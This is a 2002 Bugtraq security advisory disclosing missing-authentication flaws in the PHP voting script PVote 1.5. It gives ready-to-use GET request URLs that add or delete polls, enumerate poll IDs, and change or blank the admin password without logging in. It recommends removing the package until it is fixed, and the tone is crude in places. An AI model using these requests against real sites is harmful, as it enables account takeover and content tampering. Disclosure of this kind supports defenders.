[25134] in bugtraq
[[ TH 026 Inc. ]] SA #1 - Multiple vulnerabilities in PVote 1.5
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Daniel_Nystr=F6m?=)
Thu Apr 18 12:35:18 2002
Message-ID: <006201c1e674$ca0dee70$0b00a8c0@Natasha>
From: =?iso-8859-1?Q?Daniel_Nystr=F6m?= <exce@netwinder.nu>
To: <bugtraq@securityfocus.com>
Date: Thu, 18 Apr 2002 03:03:02 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Telhack Security Advisory - #1
_________________________________________
Name: PVote 1.5b
Impact: Minor (Content manipulation, Script admin)
Date: April 18 / 2002
_________________________________________
Daniel Nyström <exce@netwinder.nu>
_I N F O_
PVote is a PHP voting system. It uses MySQL to hold all information about
the system.
Author has been notified of all three problems described in this advisory.
_P R O B L E M_
A lot of the scripts in the PVote package do not properly check who the
userare and
therefore lets anyone add or delete polls at any time. Also, there exist a
vulnerability that
lets anyone change the Admin password or set it to null.
_I M P A C T_
Minor, as content manipulation aint to bad after all. Just a little bit
embarrasing.
_E X P L O I T I N G_
These 'Add/Del' and 'Admin change pass' vulns. can all be exploited from a
web browser by a
basic GET requests that might look something like these:
ADD
http://isp.net/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4
=bad
Question is the question:) o1-o4 are the options.
DEL
http://isp.net/pvote/del.php?pollorder=1
Pollorder is the poll 'id' number. It can be found by stepping thru poll.php
to find the id as shown below:
http://isp.net/pvote/poll.php?pollorder=1
and then increase pollorder (pollorder=2) and so on until you find what you
want.
CHANGE ADMIN PASS
http://isp.net/pvote/ch_info.php?newpass=owned&confirm=owned
Again we are allowed to change stuff without having to authenticate in
anyway.
If we just wanna fuck with the admin we may just enter this:
http://isp.net/pvote/ch_info.php
As it sets both newpass and confirm to "" it sets the pass to "". This thing
could
have been avoided by just adding a line of code that required you to submit
the old pass to be able to change.
_F I X E S_
Many of the scripts in this package needs some kind of secure
authenticationmethod that stops users
from behaving badly >:) and I think it is up to the author(s?) to fix that.
But until then, I would recommend removing the package.
/Daniel Nyström a.k.a excE @ Telhack 026 Inc.
http://excelsi0r.darktech.org/~exce/
http://www.telhack.com <- page temporarily down.
